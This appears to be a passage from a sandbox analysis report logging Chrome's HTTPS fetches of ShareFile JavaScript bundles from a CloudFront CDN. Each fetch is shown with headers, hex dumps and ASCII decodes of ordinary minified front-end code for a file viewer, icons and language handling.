                                                                                                                                                                                                                      Data Ascii: Exited;return{children:t.firstRender?(n=e,r=a,F(n.children,(function(e){return(0,m.cloneElement)(e,{onExited:r.bind(null,e),in:!0,appear:L(e,"appear",n),enter:L(e,"enter",n),exit:L(e,"exit",n)})}))):N(e,o,a),firstRender:!1}},n.handleExited=function(e,t){v
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC12288INData Raw: 72 2c 22 65 6d 22 29 2c 6d 3d 22 22 2e 63 6f 6e 63 61 74 28 31 32 30 30 2f 72 2c 22 65 6d 22 29 2c 68 3d 22 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 22 2e 63 6f 6e 63 61 74 28 75 2c 22 29 22 29 2c 67 3d 22 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 29 22 29 2c 76 3d 22 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 22 2e 63 6f 6e 63 61 74 28 64 2c 22 29 22 29 2c 79 3d 22 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 22 2e 63 6f 6e 63 61 74 28 66 2c 22 29 22 29 3b 22 40 6d 65 64 69
                                                                                                                                                                                                                      Data Ascii: r,"em"),m="".concat(1200/r,"em"),h="@media only screen and (max-width: ".concat(u,")"),g="@media only screen and (min-width: ".concat(l,")"),v="@media only screen and (max-width: ".concat(d,")"),y="@media only screen and (max-width: ".concat(f,")");"@medi
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 50 68 6f 74 6f 73 68 6f 70 49 63 6f 6e 3a 22 50 68 6f 74 6f 73 68 6f 70 20 66 69 6c 65 22 2c 50 6f 77 65 72 70 6f 69 6e 74 49 63 6f 6e 3a 22 50 6f 77 65 72 70 6f 69 6e 74 20 66 69 6c 65 22 2c 50 75 62 49 63 6f 6e 3a 22 50 75 62 6c 69 73 68 65 72 20 66 69 6c 65 22 2c 51 62 62 49 63 6f 6e 3a 22 51 75 69 63 6b 42 6f 6f 6b 73 20 42 61 63 6b 75 70 20 66 69 6c 65 22 2c 51 62 77 49 63 6f 6e 3a 22 51 75 69 63 6b 42 6f 6f 6b 73 20 66 69 6c 65 22 2c 52 65 71 75 65 73 74 4c 69 73 74 49 63 6f 6e 3a 22 50 42 43 20 4c 69 73 74 20 66 69 6c 65 22 2c 52 76 74 49 63 6f 6e 3a 22 52 65 76 69 74 20 66 69 6c 65 22 2c 53 6b 65 74 63 68 49 63 6f 6e 3a 22 53 6b 65 74 63 68 20 66 69 6c 65 22 2c 53 75 63 63 65 73 73 49 63 6f 6e 3a 22 53 75 63 63 65 73 73 20 69 63 6f 6e 22 2c 54 65
                                                                                                                                                                                                                      Data Ascii: PhotoshopIcon:"Photoshop file",PowerpointIcon:"Powerpoint file",PubIcon:"Publisher file",QbbIcon:"QuickBooks Backup file",QbwIcon:"QuickBooks file",RequestListIcon:"PBC List file",RvtIcon:"Revit file",SketchIcon:"Sketch file",SuccessIcon:"Success icon",Te


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      33192.168.2.174974613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC606OUTGET /sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 871937
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:26:16 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:09 GMT
                                                                                                                                                                                                                      ETag: "6d9484a85b5ff2d8a7fc7c926c5aa72c"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 630336d6cdf08cf266841fd503dc03d0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: WJnKMo4F0Q9qEHcUio6uPaaQUgv58g9fzyYhxTq916KL-urqtblOTg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 66 69 6c 65 76 69 65 77 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 72 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 3d 74 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 2c 6e 2e 64 65 66 61 75 6c 74 41 6e 74 44 43 6f 6e 66 69 67 3d 74 2e 64 65 66 61 75 6c 74
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{})System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(t,e){var n={},i={},r={},s={};return{setters:[function(t){n.colorPalette=t.colorPalette,n.defaultAntDConfig=t.default
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 74 72 69 62 75 74 65 28 79 74 29 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 77 74 29 7c 7c 30 29 3b 72 65 74 75 72 6e 20 73 3e 3d 65 7d 29 29 3b 69 66 28 75 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 63 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 75 5b 75 2e 6c 65 6e 67 74 68 2d 31 5d 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 2c 6c 7d 63 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 68 29 7d 65 6c 73 65 20 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6c 29 3b 72 65 74 75 72 6e 20 6c 7d 66 75 6e 63 74 69 6f 6e 20 6b 74 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67
                                                                                                                                                                                                                      Data Ascii: tribute(yt)))return!1;var e=Number(t.getAttribute(wt)||0);return s>=e}));if(u.length)return c.insertBefore(l,u[u.length-1].nextSibling),l}c.insertBefore(l,h)}else c.appendChild(l);return l}function kt(t){var e=arguments.length>1&&void 0!==arguments[1]?arg
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 37 43 32 2e 37 34 37 20 32 20 32 20 32 2e 37 34 36 20 32 20 33 2e 36 36 37 76 31 36 2e 36 36 36 43 32 20 32 31 2e 32 35 33 20 32 2e 37 34 36 20 32 32 20 33 2e 36 36 37 20 32 32 68 31 36 2e 36 36 36 63 2e 39 32 20 30 20 31 2e 36 36 37 2d 2e 37 34 36 20 31 2e 36 36 37 2d 31 2e 36 36 37 56 33 2e 36 36 37 43 32 32 20 32 2e 37 34 37 20 32 31 2e 32 35 34 20 32 20 32 30 2e 33 33 33 20 32 22 7d 29 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 66 66 66 22 2c 64 3a 22 4d 31 37 2e 38 33 34 20 37 48 36 2e 31 36 37 61 2e 38 33 33 2e 38 33 33 20 30 20 30 20 30 2d 2e 38 33 33 2e 38 33 33 76 38 2e 33 33 34 63 30 20 2e 34 36 2e 33 37 33 2e 38 33 33 2e 38 33 33 2e 38 33 33 68 31 31 2e 36 36 37 63 2e 34 36 20 30 20 2e 38 33
                                                                                                                                                                                                                      Data Ascii: 7C2.747 2 2 2.746 2 3.667v16.666C2 21.253 2.746 22 3.667 22h16.666c.92 0 1.667-.746 1.667-1.667V3.667C22 2.747 21.254 2 20.333 2"}),r.createElement("path",{fill:"#fff",d:"M17.834 7H6.167a.833.833 0 0 0-.833.833v8.334c0 .46.373.833.833.833h11.667c.46 0 .83
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC15232INData Raw: 76 2d 31 2e 39 36 35 48 37 2e 35 39 63 31 2e 31 35 35 20 30 20 31 2e 39 32 34 2d 2e 36 33 20 31 2e 39 32 34 2d 31 2e 37 30 36 20 30 2d 31 2e 31 33 36 2d 2e 38 37 34 2d 31 2e 37 35 31 2d 32 2e 30 34 34 2d 31 2e 37 35 31 48 35 2e 35 34 36 56 31 34 2e 35 7a 6d 31 2e 30 39 35 2d 32 2e 36 39 36 48 36 2e 34 36 35 56 39 2e 37 39 38 68 31 2e 30 37 36 63 2e 36 33 34 20 30 20 31 2e 31 30 37 2e 33 35 36 20 31 2e 31 30 37 2e 39 37 38 20 30 20 2e 36 31 32 2d 2e 34 34 37 20 31 2e 30 32 38 2d 31 2e 30 38 20 31 2e 30 32 38 4d 31 31 2e 33 31 20 31 34 2e 35 76 2d 31 2e 39 36 35 68 31 2e 31 31 38 63 31 2e 31 35 35 20 30 20 31 2e 39 32 33 2d 2e 36 33 20 31 2e 39 32 33 2d 31 2e 37 30 36 20 30 2d 31 2e 31 33 36 2d 2e 38 37 33 2d 31 2e 37 35 31 2d 32 2e 30 34 33 2d 31 2e 37 35
                                                                                                                                                                                                                      Data Ascii: v-1.965H7.59c1.155 0 1.924-.63 1.924-1.706 0-1.136-.874-1.751-2.044-1.751H5.546V14.5zm1.095-2.696H6.465V9.798h1.076c.634 0 1.107.356 1.107.978 0 .612-.447 1.028-1.08 1.028M11.31 14.5v-1.965h1.118c1.155 0 1.923-.63 1.923-1.706 0-1.136-.873-1.751-2.043-1.75
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 22 69 6e 78 22 5d 2c 6b 65 79 6e 6f 74 65 3a 5b 22 6b 65 79 22 5d 2c 72 69 76 65 74 3a 5b 22 72 76 74 22 5d 2c 6e 61 76 69 73 77 6f 72 6b 73 3a 5b 22 6e 77 64 22 2c 22 6e 77 66 22 5d 2c 6e 6f 74 65 77 6f 72 74 68 79 43 6f 6d 70 6f 73 65 72 3a 5b 22 6e 77 63 22 2c 22 6e 77 63 74 78 74 22 5d 2c 6e 75 6d 62 65 72 73 3a 5b 22 6e 75 6d 62 65 72 73 22 5d 2c 6f 6e 65 6e 6f 74 65 3a 5b 22 6f 6e 65 22 2c 22 6f 6e 65 61 22 2c 22 6f 6e 65 74 6f 63 22 2c 22 6f 6e 65 74 6f 63 32 22 2c 22 6f 6e 65 74 6d 70 22 2c 22 6f 6e 65 70 6b 67 22 5d 2c 70 61 67 65 73 3a 5b 22 70 61 67 65 73 22 5d 2c 70 64 66 3a 5b 22 70 64 66 22 5d 2c 70 68 6f 74 6f 73 68 6f 70 3a 5b 22 70 73 64 22 2c 22 70 73 22 5d 2c 70 6f 77 65 72 70 6f 69 6e 74 3a 5b 22 70 6f 74 22 2c 22 70 6f 74 6d 22 2c 22
                                                                                                                                                                                                                      Data Ascii: "inx"],keynote:["key"],rivet:["rvt"],navisworks:["nwd","nwf"],noteworthyComposer:["nwc","nwctxt"],numbers:["numbers"],onenote:["one","onea","onetoc","onetoc2","onetmp","onepkg"],pages:["pages"],pdf:["pdf"],photoshop:["psd","ps"],powerpoint:["pot","potm","
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 63 3c 3d 30 2c 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 69 6d 61 67 65 76 69 65 77 65 72 2d 7a 6f 6f 6d 6f 75 74 22 7d 29 2c 72 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 2c 7b 73 74 79 6c 65 3a 7b 6d 61 72 67 69 6e 3a 22 30 20 31 30 70 78 22 7d 7d 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 31 30 30 2a 63 29 2c 22 25 22 29 2c 72 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 4f 6e 2e 42 75 74 74 6f 6e 2c 7b 69 63 6f 6e 3a 72 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 47 6e 2c 6e 75 6c 6c 29 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 69 6e 28 74 2b 2e 31 2c 32 29 7d 29
                                                                                                                                                                                                                      Data Ascii: c<=0,"data-testid":"imageviewer-zoomout"}),r.default.createElement("span",{style:{margin:"0 10px"}},Math.round(100*c),"%"),r.default.createElement(On.Button,{icon:r.default.createElement(Gn,null),onClick:function(){h((function(t){return Math.min(t+.1,2)})
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 4d 53 49 45 22 29 3e 2d 31 2c 47 69 3d 5b 22 20 22 2c 22 2c 22 2c 22 3f 22 2c 22 21 22 2c 22 3b 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 4b 69 28 74 2c 65 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 74 29 3b 65 26 26 28 69 3d 69 2e 66 69
                                                                                                                                                                                                                      Data Ascii: 0===window.navigator.userAgentData&&window.navigator.userAgent&&window.navigator.userAgent.indexOf("MSIE")>-1,Gi=[" ",",","?","!",";"];function Ki(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);e&&(i=i.fi
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC15108INData Raw: 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 74 3f 28 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 65 29 7b 76 61 72 20 69 3d 6e 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 74 29 3b 6e 2e 6f 70 74 69 6f 6e 73 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 26 26 21 6e 2e 69 73 53 75 70 70 6f 72 74 65 64 43 6f 64 65 28 69 29 7c 7c 28 65 3d 69 29 7d 7d 29 29 2c 21 65 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 26 26 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 65 29 7b 76 61 72 20 69 3d 6e 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28
                                                                                                                                                                                                                      Data Ascii: ",value:function(t){var e,n=this;return t?(t.forEach((function(t){if(!e){var i=n.formatLanguageCode(t);n.options.supportedLngs&&!n.isSupportedCode(i)||(e=i)}})),!e&&this.options.supportedLngs&&t.forEach((function(t){if(!e){var i=n.getLanguagePartFromCode(
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC1276INData Raw: 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 65 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 69 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 31 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3a 7b 7d 3b 65 25 32 3f 77 72 28 4f 62 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 70 28 74 2c 65 2c 6e 5b 65 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f
                                                                                                                                                                                                                      Data Ascii: ect.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,i)}return n}function _r(t){for(var e=1;e<arguments.length;e++){var n=null!=arguments[e]?arguments[e]:{};e%2?wr(Object(n),!0).forEach((function(e){p(t,e,n[e])})):Object.getOwnPropertyDescripto
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC16384INData Raw: 65 74 72 79 54 69 6d 65 6f 75 74 3d 61 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3e 3d 31 3f 61 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3a 33 35 30 2c 73 2e 73 74 61 74 65 3d 7b 7d 2c 73 2e 71 75 65 75 65 3d 5b 5d 2c 73 2e 62 61 63 6b 65 6e 64 26 26 73 2e 62 61 63 6b 65 6e 64 2e 69 6e 69 74 26 26 73 2e 62 61 63 6b 65 6e 64 2e 69 6e 69 74 28 72 2c 61 2e 62 61 63 6b 65 6e 64 2c 61 29 2c 73 7d 72 65 74 75 72 6e 20 41 69 28 6e 2c 5b 7b 6b 65 79 3a 22 71 75 65 75 65 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 2c 6c 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 21 30 3b 65
                                                                                                                                                                                                                      Data Ascii: etryTimeout=a.retryTimeout>=1?a.retryTimeout:350,s.state={},s.queue=[],s.backend&&s.backend.init&&s.backend.init(r,a.backend,a),s}return Ai(n,[{key:"queueLoad",value:function(t,e,n,i){var r=this,s={},a={},o={},l={};return t.forEach((function(t){var i=!0;e


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      34192.168.2.174975313.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC419OUTGET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 199868
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 30 Jul 2024 08:42:51 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:08 GMT
                                                                                                                                                                                                                      ETag: "114e798d503a347aab2a537702e1593f"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 7a18a0a1d9929dae345690b88b08dd5e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: -PLNKu7_PKY76aUc6qBordsg3FvtROSbwVwBbroy8-7_Glg8R8o-sQ==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 61 73 6b 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProp
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC16384INData Raw: 64 3a 22 54 68 72 65 61 64 65 64 22 2c 43 6c 6f 75 64 4e 61 74 69 76 65 53 74 61 6e 64 61 72 64 3a 22 43 6c 6f 75 64 4e 61 74 69 76 65 53 74 61 6e 64 61 72 64 22 2c 43 6c 6f 75 64 4e 61 74 69 76 65 4d 75 6c 74 69 50 61 72 74 3a 22 43 6c 6f 75 64 4e 61 74 69 76 65 4d 75 6c 74 69 50 61 72 74 22 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 4e 6f 6e 65 3d 30 5d 3d 22 4e 6f 6e 65 22 2c 65 5b 65 2e 53 74 6f 72 61 67 65 5a 6f 6e 65 3d 31 5d 3d 22 53 74 6f 72 61 67 65 5a 6f 6e 65 22 2c 65 5b 65 2e 4e 65 74 77 6f 72 6b 53 68 61 72 65 43 6f 6e 6e 65 63 74 6f 72 3d 32 5d 3d 22 4e 65 74 77 6f 72 6b 53 68 61 72 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 53 68 61 72 65 70 6f 69 6e 74 43 6f 6e 6e 65 63 74 6f 72 3d 34 5d 3d 22 53 68 61 72 65 70 6f 69 6e
                                                                                                                                                                                                                      Data Ascii: d:"Threaded",CloudNativeStandard:"CloudNativeStandard",CloudNativeMultiPart:"CloudNativeMultiPart"};!function(e){e[e.None=0]="None",e[e.StorageZone=1]="StorageZone",e[e.NetworkShareConnector=2]="NetworkShareConnector",e[e.SharepointConnector=4]="Sharepoin
                                                                                                                                                                                                                      2024-11-05 19:36:08 UTC16384INData Raw: 7d 72 65 74 75 72 6e 20 65 3d 6f 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 72 2e 69 73 53 74 72 69 6e 67 28 74 29 3f 6f 28 74 29 3a 74 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 6e 2e 68 6f 73 74 3d 3d 3d 65 2e 68 6f 73 74 7d 7d 28 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 7d 2c 31 37 30 31 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 34 35 31 35 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 2e 66 6f 72 45 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 72 21 3d 3d 74 26 26 72 2e 74 6f 55 70
                                                                                                                                                                                                                      Data Ascii: }return e=o(window.location.href),function(t){var n=r.isString(t)?o(t):t;return n.protocol===e.protocol&&n.host===e.host}}():function(){return!0}},17015:(e,t,n)=>{"use strict";var r=n(84515);e.exports=function(e,t){r.forEach(e,(function(n,r){r!==t&&r.toUp
